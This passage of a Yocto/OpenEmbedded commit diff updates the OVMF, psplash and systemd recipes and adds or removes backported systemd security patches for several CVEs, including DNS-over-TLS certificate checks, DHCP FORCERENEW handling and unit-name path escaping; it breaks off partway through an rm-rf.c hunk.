Date: Sat, 10 Jun 2017 01:39:36 -0700
-Subject: [PATCH 4/5] ovmf: Update to latest
+Subject: [PATCH 4/4] ovmf: Update to latest
Description: pass -fno-stack-protector to all GCC toolchains
The upstream build rules inexplicably pass -fno-stack-protector only
@@ -15,15 +15,15 @@ Upstream-Status: Pending
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/BaseTools/Conf/tools_def.template b/BaseTools/Conf/tools_def.template
-index ca0b122dbb..b0066c2ab8 100755
+index 933b3160fd..c2fbbf0c38 100755
--- a/BaseTools/Conf/tools_def.template
+++ b/BaseTools/Conf/tools_def.template
-@@ -1941,10 +1941,10 @@ DEFINE GCC_X64_RC_FLAGS = -I binary -O elf64-x86-64 -B i386
- DEFINE GCC_ARM_RC_FLAGS = -I binary -O elf32-littlearm -B arm --rename-section .data=.hii
- DEFINE GCC_AARCH64_RC_FLAGS = -I binary -O elf64-littleaarch64 -B aarch64 --rename-section .data=.hii
+@@ -1952,10 +1952,10 @@ DEFINE GCC_RISCV64_RC_FLAGS = -I binary -O elf64-littleriscv -B riscv
+ # GCC Build Flag for included header file list generation
+ DEFINE GCC_DEPS_FLAGS = -MMD -MF $@.deps
--DEFINE GCC48_ALL_CC_FLAGS = -g -fshort-wchar -fno-builtin -fno-strict-aliasing -Wall -Werror -Wno-array-bounds -ffunction-sections -fdata-sections -include AutoGen.h -fno-common -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings
-+DEFINE GCC48_ALL_CC_FLAGS = -g -fshort-wchar -fno-builtin -fno-strict-aliasing -Wall -Werror -Wno-array-bounds -ffunction-sections -fdata-sections -fno-stack-protector -include AutoGen.h -fno-common -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings
+-DEFINE GCC48_ALL_CC_FLAGS = DEF(GCC_ALL_CC_FLAGS) -ffunction-sections -fdata-sections -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings
++DEFINE GCC48_ALL_CC_FLAGS = DEF(GCC_ALL_CC_FLAGS) -ffunction-sections -fdata-sections -fno-stack-protector -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings
DEFINE GCC48_IA32_X64_DLINK_COMMON = -nostdlib -Wl,-n,-q,--gc-sections -z common-page-size=0x20
-DEFINE GCC48_IA32_CC_FLAGS = DEF(GCC48_ALL_CC_FLAGS) -m32 -march=i586 -malign-double -fno-stack-protector -D EFI32 -fno-asynchronous-unwind-tables -Wno-address
-DEFINE GCC48_X64_CC_FLAGS = DEF(GCC48_ALL_CC_FLAGS) -m64 -fno-stack-protector "-DEFIAPI=__attribute__((ms_abi))" -maccumulate-outgoing-args -mno-red-zone -Wno-address -mcmodel=small -fpie -fno-asynchronous-unwind-tables -Wno-address
@@ -32,7 +32,7 @@ index ca0b122dbb..b0066c2ab8 100755
DEFINE GCC48_IA32_X64_ASLDLINK_FLAGS = DEF(GCC48_IA32_X64_DLINK_COMMON) -Wl,--entry,ReferenceAcpiTable -u ReferenceAcpiTable
DEFINE GCC48_IA32_X64_DLINK_FLAGS = DEF(GCC48_IA32_X64_DLINK_COMMON) -Wl,--entry,$(IMAGE_ENTRY_POINT) -u $(IMAGE_ENTRY_POINT) -Wl,-Map,$(DEST_DIR_DEBUG)/$(BASE_NAME).map,--whole-archive
DEFINE GCC48_IA32_DLINK2_FLAGS = -Wl,--defsym=PECOFF_HEADER_SIZE=0x220 DEF(GCC_DLINK2_FLAGS_COMMON)
-@@ -1953,7 +1953,7 @@ DEFINE GCC48_X64_DLINK2_FLAGS = -Wl,--defsym=PECOFF_HEADER_SIZE=0x228 DEF
+@@ -1964,7 +1964,7 @@ DEFINE GCC48_X64_DLINK2_FLAGS = -Wl,--defsym=PECOFF_HEADER_SIZE=0x228 DEF
DEFINE GCC48_ASM_FLAGS = DEF(GCC_ASM_FLAGS)
DEFINE GCC48_ARM_ASM_FLAGS = $(ARCHASM_FLAGS) $(PLATFORM_FLAGS) DEF(GCC_ASM_FLAGS) -mlittle-endian
DEFINE GCC48_AARCH64_ASM_FLAGS = $(ARCHASM_FLAGS) $(PLATFORM_FLAGS) DEF(GCC_ASM_FLAGS) -mlittle-endian
@@ -42,5 +42,5 @@ index ca0b122dbb..b0066c2ab8 100755
DEFINE GCC48_AARCH64_CC_FLAGS = $(ARCHCC_FLAGS) $(PLATFORM_FLAGS) -mcmodel=large DEF(GCC_AARCH64_CC_FLAGS)
DEFINE GCC48_AARCH64_CC_XIPFLAGS = DEF(GCC_AARCH64_CC_XIPFLAGS)
--
-2.17.1
+2.28.0
diff --git a/meta/recipes-core/ovmf/ovmf_git.bb b/meta/recipes-core/ovmf/ovmf_git.bb
index 9667fa0c86..a487f77e3c 100644
--- a/meta/recipes-core/ovmf/ovmf_git.bb
+++ b/meta/recipes-core/ovmf/ovmf_git.bb
@@ -12,15 +12,19 @@ LIC_FILES_CHKSUM = "file://OvmfPkg/License.txt;md5=06357ddc23f46577c2aeaeaf7b776
PACKAGECONFIG ??= ""
PACKAGECONFIG[secureboot] = ",,,"
-SRC_URI = "gitsm://github.com/tianocore/edk2.git;branch=master;protocol=git \
+SRC_URI = "gitsm://github.com/tianocore/edk2.git;branch=master;protocol=https \
file://0001-ovmf-update-path-to-native-BaseTools.patch \
file://0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch \
file://0003-ovmf-enable-long-path-file.patch \
file://0004-ovmf-Update-to-latest.patch \
- "
-
-PV = "edk2-stable201911"
-SRCREV = "bd85bf54c268204c7a698a96f3ccd96cd77952cd"
+ file://0001-Fix-VLA-parameter-warning.patch \
+ file://0001-Basetools-genffs-fix-gcc12-warning.patch \
+ file://0001-Basetools-lzmaenc-fix-gcc12-warning.patch \
+ file://0001-Basetools-turn-off-gcc12-warning.patch \
+ "
+
+PV = "edk2-stable202008"
+SRCREV = "06dc822d045c2bb42e497487935485302486e151"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>edk2-stable.*)"
inherit deploy
@@ -37,7 +41,7 @@ EDK_TOOLS_DIR="edk2_basetools"
BUILD_OPTIMIZATION="-pipe"
# OVMF supports IA only, although it could conceivably support ARM someday.
-COMPATIBLE_HOST='(i.86|x86_64).*'
+COMPATIBLE_HOST_class-target='(i.86|x86_64).*'
# Additional build flags for OVMF with Secure Boot.
# Fedora also uses "-D SMM_REQUIRE -D EXCLUDE_SHELL_FROM_FD".
diff --git a/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb b/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb
index 5ec3f6c927..5523f874db 100644
--- a/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb
+++ b/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb
@@ -4,3 +4,4 @@ PR = "r1"
inherit packagegroup
RDEPENDS_${PN} = "dropbear"
+RRECOMMENDS_${PN} = "openssh-sftp-server"
diff --git a/meta/recipes-core/psplash/files/psplash-start.service b/meta/recipes-core/psplash/files/psplash-start.service
index 36c2bb38e0..bec9368427 100644
--- a/meta/recipes-core/psplash/files/psplash-start.service
+++ b/meta/recipes-core/psplash/files/psplash-start.service
@@ -2,6 +2,7 @@
Description=Start psplash boot splash screen
DefaultDependencies=no
RequiresMountsFor=/run
+ConditionFileIsExecutable=/usr/bin/psplash
[Service]
Type=notify
diff --git a/meta/recipes-core/psplash/files/psplash-systemd.service b/meta/recipes-core/psplash/files/psplash-systemd.service
index 082207f232..e93e3deb35 100644
--- a/meta/recipes-core/psplash/files/psplash-systemd.service
+++ b/meta/recipes-core/psplash/files/psplash-systemd.service
@@ -4,6 +4,7 @@ DefaultDependencies=no
After=psplash-start.service
Requires=psplash-start.service
RequiresMountsFor=/run
+ConditionFileIsExecutable=/usr/bin/psplash
[Service]
ExecStart=/usr/bin/psplash-systemd
diff --git a/meta/recipes-core/psplash/psplash_git.bb b/meta/recipes-core/psplash/psplash_git.bb
index 22c71f099b..b2947c2114 100644
--- a/meta/recipes-core/psplash/psplash_git.bb
+++ b/meta/recipes-core/psplash/psplash_git.bb
@@ -10,7 +10,7 @@ SRCREV = "0a902f7cd875ccf018456451be369f05fa55f962"
PV = "0.1+git${SRCPV}"
PR = "r15"
-SRC_URI = "git://git.yoctoproject.org/${BPN} \
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \
file://psplash-init \
file://psplash-start.service \
file://psplash-systemd.service \
diff --git a/meta/recipes-core/systemd/systemd-boot_244.3.bb b/meta/recipes-core/systemd/systemd-boot_244.5.bb
index f92c639810..f92c639810 100644
--- a/meta/recipes-core/systemd/systemd-boot_244.3.bb
+++ b/meta/recipes-core/systemd/systemd-boot_244.5.bb
diff --git a/meta/recipes-core/systemd/systemd-conf/wired.network b/meta/recipes-core/systemd/systemd-conf/wired.network
index ff807ba31f..34c20fcb24 100644
--- a/meta/recipes-core/systemd/systemd-conf/wired.network
+++ b/meta/recipes-core/systemd/systemd-conf/wired.network
@@ -1,6 +1,7 @@
[Match]
Name=en* eth*
KernelCommandLine=!nfsroot
+KernelCommandLine=!ip
[Network]
DHCP=yes
diff --git a/meta/recipes-core/systemd/systemd-conf_244.3.bb b/meta/recipes-core/systemd/systemd-conf_244.3.bb
index d9ec023bfd..9b797a91f4 100644
--- a/meta/recipes-core/systemd/systemd-conf_244.3.bb
+++ b/meta/recipes-core/systemd/systemd-conf_244.3.bb
@@ -23,9 +23,6 @@ do_install() {
# Based on change from YP bug 8141, OE commit 5196d7bacaef1076c361adaa2867be31759c1b52
do_install_append_qemuall() {
install -D -m0644 ${WORKDIR}/system.conf-qemuall ${D}${systemd_unitdir}/system.conf.d/01-${PN}.conf
-
- # Do not install wired.network for qemu bsps
- rm -rf ${D}${systemd_unitdir}/network
}
PACKAGE_ARCH = "${MACHINE_ARCH}"
diff --git a/meta/recipes-core/systemd/systemd-systemctl/systemctl b/meta/recipes-core/systemd/systemd-systemctl/systemctl
index 990de1ab39..e003c860e3 100755
--- a/meta/recipes-core/systemd/systemd-systemctl/systemctl
+++ b/meta/recipes-core/systemd/systemd-systemctl/systemctl
@@ -11,6 +11,7 @@ import re
import sys
from collections import namedtuple
+from itertools import chain
from pathlib import Path
version = 1.0
@@ -25,12 +26,16 @@ locations = list()
class SystemdFile():
"""Class representing a single systemd configuration file"""
- def __init__(self, root, path):
+ def __init__(self, root, path, instance_unit_name):
self.sections = dict()
self._parse(root, path)
dirname = os.path.basename(path.name) + ".d"
for location in locations:
- for path2 in sorted((root / location / "system" / dirname).glob("*.conf")):
+ files = (root / location / "system" / dirname).glob("*.conf")
+ if instance_unit_name:
+ inst_dirname = instance_unit_name + ".d"
+ files = chain(files, (root / location / "system" / inst_dirname).glob("*.conf"))
+ for path2 in sorted(files):
self._parse(root, path2)
def _parse(self, root, path):
@@ -177,12 +182,14 @@ class SystemdUnit():
raise SystemdUnitNotFoundError(self.root, unit)
- def _process_deps(self, config, service, location, prop, dirstem):
+ def _process_deps(self, config, service, location, prop, dirstem, instance):
systemdir = self.root / SYSCONFDIR / "systemd" / "system"
target = ROOT / location.relative_to(self.root)
try:
for dependent in config.get('Install', prop):
+ # expand any %i to instance (ignoring escape sequence %%)
+ dependent = re.sub("([^%](%%)*)%i", "\\g<1>{}".format(instance), dependent)
wants = systemdir / "{}.{}".format(dependent, dirstem) / service
add_link(wants, target)
@@ -193,8 +200,11 @@ class SystemdUnit():
# if we're enabling an instance, first extract the actual instance
# then figure out what the template unit is
template = re.match(r"[^@]+@(?P<instance>[^\.]*)\.", self.unit)
+ instance_unit_name = None
if template:
instance = template.group('instance')
+ if instance != "":
+ instance_unit_name = self.unit
unit = re.sub(r"@[^\.]*\.", "@.", self.unit, 1)
else:
instance = None
@@ -206,7 +216,7 @@ class SystemdUnit():
# ignore aliases
return
- config = SystemdFile(self.root, path)
+ config = SystemdFile(self.root, path, instance_unit_name)
if instance == "":
try:
default_instance = config.get('Install', 'DefaultInstance')[0]
@@ -219,8 +229,8 @@ class SystemdUnit():
else:
service = self.unit
- self._process_deps(config, service, path, 'WantedBy', 'wants')
- self._process_deps(config, service, path, 'RequiredBy', 'requires')
+ self._process_deps(config, service, path, 'WantedBy', 'wants', instance)
+ self._process_deps(config, service, path, 'RequiredBy', 'requires', instance)
try:
for also in config.get('Install', 'Also'):
diff --git a/meta/recipes-core/systemd/systemd.inc b/meta/recipes-core/systemd/systemd.inc
index e73b397b5d..8b5260bb0d 100644
--- a/meta/recipes-core/systemd/systemd.inc
+++ b/meta/recipes-core/systemd/systemd.inc
@@ -14,8 +14,8 @@ LICENSE = "GPLv2 & LGPLv2.1"
LIC_FILES_CHKSUM = "file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe \
file://LICENSE.LGPL2.1;md5=4fbd65380cdd255951079008b364516c"
-SRCREV = "b7ed902b2394f94e7f1fbe6c3194b5cd9a9429e6"
+SRCREV = "3ceaa81c61b654ebf562464d142675bd4d57d7b6"
SRCBRANCH = "v244-stable"
-SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=git;branch=${SRCBRANCH}"
+SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=https;branch=${SRCBRANCH}"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/systemd/systemd/00-create-volatile.conf b/meta/recipes-core/systemd/systemd/00-create-volatile.conf
index 87cbe1e7d3..c4277221a2 100644
--- a/meta/recipes-core/systemd/systemd/00-create-volatile.conf
+++ b/meta/recipes-core/systemd/systemd/00-create-volatile.conf
@@ -3,5 +3,6 @@
# inside /var/log.
+d /run/lock 1777 - - -
d /var/volatile/log - - - -
d /var/volatile/tmp 1777 - -
diff --git a/meta/recipes-core/systemd/systemd/CVE-2018-21029.patch b/meta/recipes-core/systemd/systemd/CVE-2018-21029.patch
new file mode 100644
index 0000000000..8d3801a248
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2018-21029.patch
@@ -0,0 +1,120 @@
+From 3f9d9289ee8730a81a0464539f4e1ba2d23d0ce9 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
+Date: Tue, 3 Mar 2020 23:31:25 +0000
+Subject: [PATCH] systemd-resolved: use hostname for certificate validation in
+ DoT
+
+Widely accepted certificates for IP addresses are expensive and only
+affordable for larger organizations. Therefore if the user provides
+the hostname in the DNS= option, we should use it instead of the IP
+address.
+
+(cherry picked from commit eec394f10bbfcc3d2fc8504ad8ff5be44231abd5)
+
+CVE: CVE-2018-21029
+Upstream-Status: Backport [ff26d281aec0877b43269f18c6282cd79a7f5529]
+Signed-off-by: Marek Vasut <marex@denx.de>
+---
+ man/resolved.conf.xml | 16 +++++++++++-----
+ src/resolve/resolved-dnstls-gnutls.c | 20 ++++++++++++--------
+ src/resolve/resolved-dnstls-openssl.c | 15 +++++++++++----
+ 3 files changed, 34 insertions(+), 17 deletions(-)
+
+diff --git a/man/resolved.conf.xml b/man/resolved.conf.xml
+index 818000145b..37161ebcbc 100644
+--- a/man/resolved.conf.xml
++++ b/man/resolved.conf.xml
+@@ -193,11 +193,17 @@
+ <varlistentry>
+ <term><varname>DNSOverTLS=</varname></term>
+ <listitem>
+- <para>Takes a boolean argument or <literal>opportunistic</literal>.
+- If true all connections to the server will be encrypted. Note that
+- this mode requires a DNS server that supports DNS-over-TLS and has
+- a valid certificate for it's IP. If the DNS server does not support
+- DNS-over-TLS all DNS requests will fail. When set to <literal>opportunistic</literal>
++ <para>Takes a boolean argument or <literal>opportunistic</literal>. If
++ true all connections to the server will be encrypted. Note that this
++ mode requires a DNS server that supports DNS-over-TLS and has a valid
++ certificate. If the hostname was specified in <varname>DNS=</varname>
++ by using the format format <literal>address#server_name</literal> it
++ is used to validate its certificate and also to enable Server Name
++ Indication (SNI) when opening a TLS connection. Otherwise
++ the certificate is checked against the server's IP.
++ If the DNS server does not support DNS-over-TLS all DNS requests will fail.</para>
++
++ <para>When set to <literal>opportunistic</literal>
+ DNS request are attempted to send encrypted with DNS-over-TLS.
+ If the DNS server does not support TLS, DNS-over-TLS is disabled.
+ Note that this mode makes DNS-over-TLS vulnerable to "downgrade"
+diff --git a/src/resolve/resolved-dnstls-gnutls.c b/src/resolve/resolved-dnstls-gnutls.c
+index ed0a31e8bf..c7215723a7 100644
+--- a/src/resolve/resolved-dnstls-gnutls.c
++++ b/src/resolve/resolved-dnstls-gnutls.c
+@@ -56,15 +56,19 @@ int dnstls_stream_connect_tls(DnsStream *stream, DnsServer *server) {
+ }
+
+ if (server->manager->dns_over_tls_mode == DNS_OVER_TLS_YES) {
+- stream->dnstls_data.validation.type = GNUTLS_DT_IP_ADDRESS;
+- if (server->family == AF_INET) {
+- stream->dnstls_data.validation.data = (unsigned char*) &server->address.in.s_addr;
+- stream->dnstls_data.validation.size = 4;
+- } else {
+- stream->dnstls_data.validation.data = server->address.in6.s6_addr;
+- stream->dnstls_data.validation.size = 16;
++ if (server->server_name)
++ gnutls_session_set_verify_cert(gs, server->server_name, 0);
++ else {
++ stream->dnstls_data.validation.type = GNUTLS_DT_IP_ADDRESS;
++ if (server->family == AF_INET) {
++ stream->dnstls_data.validation.data = (unsigned char*) &server->address.in.s_addr;
++ stream->dnstls_data.validation.size = 4;
++ } else {
++ stream->dnstls_data.validation.data = server->address.in6.s6_addr;
++ stream->dnstls_data.validation.size = 16;
++ }
++ gnutls_session_set_verify_cert2(gs, &stream->dnstls_data.validation, 1, 0);
+ }
+- gnutls_session_set_verify_cert2(gs, &stream->dnstls_data.validation, 1, 0);
+ }
+
+ gnutls_handshake_set_timeout(gs, GNUTLS_DEFAULT_HANDSHAKE_TIMEOUT);
+diff --git a/src/resolve/resolved-dnstls-openssl.c b/src/resolve/resolved-dnstls-openssl.c
+index 85e202ff74..007aedaa5b 100644
+--- a/src/resolve/resolved-dnstls-openssl.c
++++ b/src/resolve/resolved-dnstls-openssl.c
+@@ -6,6 +6,7 @@
+
+ #include <openssl/bio.h>
+ #include <openssl/err.h>
++#include <openssl/x509v3.h>
+
+ #include "io-util.h"
+ #include "resolved-dns-stream.h"
+@@ -78,13 +79,19 @@ int dnstls_stream_connect_tls(DnsStream *stream, DnsServer *server) {
+
+ if (server->manager->dns_over_tls_mode == DNS_OVER_TLS_YES) {
+ X509_VERIFY_PARAM *v;
+- const unsigned char *ip;
+
+ SSL_set_verify(s, SSL_VERIFY_PEER, NULL);
+ v = SSL_get0_param(s);
+- ip = server->family == AF_INET ? (const unsigned char*) &server->address.in.s_addr : server->address.in6.s6_addr;
+- if (!X509_VERIFY_PARAM_set1_ip(v, ip, FAMILY_ADDRESS_SIZE(server->family)))
+- return -ECONNREFUSED;
++ if (server->server_name) {
++ X509_VERIFY_PARAM_set_hostflags(v, X509_CHECK_FLAG_NO_PARTIAL_WILDCARDS);
++ if (X509_VERIFY_PARAM_set1_host(v, server->server_name, 0) == 0)
++ return -ECONNREFUSED;
++ } else {
++ const unsigned char *ip;
++ ip = server->family == AF_INET ? (const unsigned char*) &server->address.in.s_addr : server->address.in6.s6_addr;
++ if (X509_VERIFY_PARAM_set1_ip(v, ip, FAMILY_ADDRESS_SIZE(server->family)) == 0)
++ return -ECONNREFUSED;
++ }
+ }
+
+ ERR_clear_error();
+--
+2.40.1
+
diff --git a/meta/recipes-core/systemd/systemd/CVE-2020-13529.patch b/meta/recipes-core/systemd/systemd/CVE-2020-13529.patch
new file mode 100644
index 0000000000..6b499efbd8
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2020-13529.patch
@@ -0,0 +1,42 @@
+From 38e980a6a5a3442c2f48b1f827284388096d8ca5 Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Thu, 24 Jun 2021 01:22:07 +0900
+Subject: [PATCH] sd-dhcp-client: tentatively ignore FORCERENEW command
+
+This makes DHCP client ignore FORCERENEW requests, as unauthenticated
+FORCERENEW requests causes a security issue (TALOS-2020-1142, CVE-2020-13529).
+
+Let's re-enable this after RFC3118 (Authentication for DHCP Messages)
+and/or RFC6704 (Forcerenew Nonce Authentication) are implemented.
+
+Fixes #16774.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd/commit/38e980a6a5a3442c2f48b1f827284388096d8ca5]
+CVE: CVE-2020-13529
+
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/libsystemd-network/sd-dhcp-client.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+--- a/src/libsystemd-network/sd-dhcp-client.c
++++ b/src/libsystemd-network/sd-dhcp-client.c
+@@ -1392,9 +1392,17 @@ static int client_handle_forcerenew(sd_dhcp_client *client, DHCPMessage *force,
+ if (r != DHCP_FORCERENEW)
+ return -ENOMSG;
+
++#if 0
+ log_dhcp_client(client, "FORCERENEW");
+
+ return 0;
++#else
++ /* FIXME: Ignore FORCERENEW requests until we implement RFC3118 (Authentication for DHCP
++ * Messages) and/or RFC6704 (Forcerenew Nonce Authentication), as unauthenticated FORCERENEW
++ * requests causes a security issue (TALOS-2020-1142, CVE-2020-13529). */
++ log_dhcp_client(client, "Received FORCERENEW, ignoring.");
++ return -ENOMSG;
++#endif
+ }
+
+ static bool lease_equal(const sd_dhcp_lease *a, const sd_dhcp_lease *b) {
diff --git a/meta/recipes-core/systemd/systemd/CVE-2020-13776.patch b/meta/recipes-core/systemd/systemd/CVE-2020-13776.patch
deleted file mode 100644
index 7b5e3e7f7a..0000000000
--- a/meta/recipes-core/systemd/systemd/CVE-2020-13776.patch
+++ /dev/null
@@ -1,96 +0,0 @@
-From 156a5fd297b61bce31630d7a52c15614bf784843 Mon Sep 17 00:00:00 2001
-From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
-Date: Sun, 31 May 2020 18:21:09 +0200
-Subject: [PATCH 1/1] basic/user-util: always use base 10 for user/group
- numbers
-
-We would parse numbers with base prefixes as user identifiers. For example,
-"0x2b3bfa0" would be interpreted as UID==45334432 and "01750" would be
-interpreted as UID==1000. This parsing was used also in cases where either a
-user/group name or number may be specified. This means that names like
-0x2b3bfa0 would be ambiguous: they are a valid user name according to our
-documented relaxed rules, but they would also be parsed as numeric uids.
-
-This behaviour is definitely not expected by users, since tools generally only
-accept decimal numbers (e.g. id, getent passwd), while other tools only accept
-user names and thus will interpret such strings as user names without even
-attempting to convert them to numbers (su, ssh). So let's follow suit and only
-accept numbers in decimal notation. Effectively this means that we will reject
-such strings as a username/uid/groupname/gid where strict mode is used, and try
-to look up a user/group with such a name in relaxed mode.
-
-Since the function changed is fairly low-level and fairly widely used, this
-affects multiple tools: loginctl show-user/enable-linger/disable-linger foo',
-the third argument in sysusers.d, fourth and fifth arguments in tmpfiles.d,
-etc.
-
-Fixes #15985.
----
- src/basic/user-util.c | 2 +-
- src/test/test-user-util.c | 10 ++++++++++
- 2 files changed, 11 insertions(+), 1 deletion(-)
-
---- end of commit 156a5fd297b61bce31630d7a52c15614bf784843 ---
-
-
-Add definition of safe_atou32_full() from commit b934ac3d6e7dcad114776ef30ee9098693e7ab7e
-
-CVE: CVE-2020-13776
-
-Upstream-Status: Backport [https://github.com/systemd/systemd.git]
-
-Signed-off-by: Joe Slater <joe.slater@windriver.com>
-
-
-
---- git.orig/src/basic/user-util.c
-+++ git/src/basic/user-util.c
-@@ -49,7 +49,7 @@ int parse_uid(const char *s, uid_t *ret)
- assert(s);
-
- assert_cc(sizeof(uid_t) == sizeof(uint32_t));
-- r = safe_atou32(s, &uid);
-+ r = safe_atou32_full(s, 10, &uid);
- if (r < 0)
- return r;
-
---- git.orig/src/test/test-user-util.c
-+++ git/src/test/test-user-util.c
-@@ -48,9 +48,19 @@ static void test_parse_uid(void) {
-
- r = parse_uid("65535", &uid);
- assert_se(r == -ENXIO);
-+ assert_se(uid == 100);
-+
-+ r = parse_uid("0x1234", &uid);
-+ assert_se(r == -EINVAL);
-+ assert_se(uid == 100);
-+
-+ r = parse_uid("01234", &uid);
-+ assert_se(r == 0);
-+ assert_se(uid == 1234);
-
- r = parse_uid("asdsdas", &uid);
- assert_se(r == -EINVAL);
-+ assert_se(uid == 1234);
- }
-
- static void test_uid_ptr(void) {
---- git.orig/src/basic/parse-util.h
-+++ git/src/basic/parse-util.h
-@@ -45,9 +45,13 @@ static inline int safe_atoux16(const cha
-
- int safe_atoi16(const char *s, int16_t *ret);
-
--static inline int safe_atou32(const char *s, uint32_t *ret_u) {
-+static inline int safe_atou32_full(const char *s, unsigned base, uint32_t *ret_u) {
- assert_cc(sizeof(uint32_t) == sizeof(unsigned));
-- return safe_atou(s, (unsigned*) ret_u);
-+ return safe_atou_full(s, base, (unsigned*) ret_u);
-+}
-+
-+static inline int safe_atou32(const char *s, uint32_t *ret_u) {
-+ return safe_atou32_full(s, 0, (unsigned*) ret_u);
- }
-
- static inline int safe_atoi32(const char *s, int32_t *ret_i) {
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-33910.patch b/meta/recipes-core/systemd/systemd/CVE-2021-33910.patch
new file mode 100644
index 0000000000..e92d721d3d
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-33910.patch
@@ -0,0 +1,67 @@
+Backport of:
+
+From 441e0115646d54f080e5c3bb0ba477c892861ab9 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Wed, 23 Jun 2021 11:46:41 +0200
+Subject: [PATCH 1/2] basic/unit-name: do not use strdupa() on a path
+
+The path may have unbounded length, for example through a fuse mount.
+
+CVE-2021-33910: attacked controlled alloca() leads to crash in systemd and
+ultimately a kernel panic. Systemd parses the content of /proc/self/mountinfo
+and each mountpoint is passed to mount_setup_unit(), which calls
+unit_name_path_escape() underneath. A local attacker who is able to mount a
+filesystem with a very long path can crash systemd and the whole system.
+
+https://bugzilla.redhat.com/show_bug.cgi?id=1970887
+
+The resulting string length is bounded by UNIT_NAME_MAX, which is 256. But we
+can't easily check the length after simplification before doing the
+simplification, which in turns uses a copy of the string we can write to.
+So we can't reject paths that are too long before doing the duplication.
+Hence the most obvious solution is to switch back to strdup(), as before
+7410616cd9dbbec97cf98d75324da5cda2b2f7a2.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9]
+CVE: CVE-2021-33910
+
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/basic/unit-name.c | 13 +++++--------
+ 1 file changed, 5 insertions(+), 8 deletions(-)
+
+--- a/src/basic/unit-name.c
++++ b/src/basic/unit-name.c
+@@ -369,12 +369,13 @@ int unit_name_unescape(const char *f, char **ret) {
+ }
+
+ int unit_name_path_escape(const char *f, char **ret) {
+- char *p, *s;
++ _cleanup_free_ char *p = NULL;
++ char *s;
+
+ assert(f);
+ assert(ret);
+
+- p = strdupa(f);
++ p = strdup(f);
+ if (!p)
+ return -ENOMEM;
+
+@@ -386,13 +387,9 @@ int unit_name_path_escape(const char *f, char **ret) {
+ if (!path_is_normalized(p))
+ return -EINVAL;
+
+- /* Truncate trailing slashes */
++ /* Truncate trailing slashes and skip leading slashes */
+ delete_trailing_chars(p, "/");
+-
+- /* Truncate leading slashes */
+- p = skip_leading_chars(p, "/");
+-
+- s = unit_name_escape(p);
++ s = unit_name_escape(skip_leading_chars(p, "/"));
+ }
+ if (!s)
+ return -ENOMEM;
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch b/meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch
new file mode 100644
index 0000000000..341976822b
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch
@@ -0,0 +1,65 @@
+Backport of the following upstream commit:
+From fbb77e1e55866633c9f064e2b3bcf2b6402d962d Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Tue, 23 Nov 2021 15:55:45 +0100
+Subject: [PATCH 1/3] shared/rm_rf: refactor rm_rf_children_inner() to shorten
+ code a bit
+
+CVE: CVE-2021-3997
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 27 +++++++++------------------
+ 1 file changed, 9 insertions(+), 18 deletions(-)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -34,7 +34,7 @@
+ const struct stat *root_dev) {
+
+ struct stat st;
+- int r;
++ int r, q = 0;
+
+ assert(fd >= 0);
+ assert(fname);
+@@ -50,7 +50,6 @@
+
+ if (is_dir) {
+ _cleanup_close_ int subdir_fd = -1;
+- int q;
+
+ /* if root_dev is set, remove subdirectories only if device is same */
+ if (root_dev && st.st_dev != root_dev->st_dev)
+@@ -86,23 +85,15 @@
+ * again for each directory */
+ q = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
+
+- r = unlinkat(fd, fname, AT_REMOVEDIR);
+- if (r < 0)
+- return r;
+- if (q < 0)
+- return q;
+-
+- return 1;
+-
+- } else if (!(flags & REMOVE_ONLY_DIRECTORIES)) {
+- r = unlinkat(fd, fname, 0);
+- if (r < 0)
+- return r;
+-
+- return 1;
+- }
++ } else if (flags & REMOVE_ONLY_DIRECTORIES)
++ return 0;
+
+- return 0;
++ r = unlinkat(fd, fname, is_dir ? AT_REMOVEDIR : 0);
++ if (r < 0)
++ return r;
++ if (q < 0)
++ return q;
++ return 1;
+ }
+
+ int rm_rf_children(
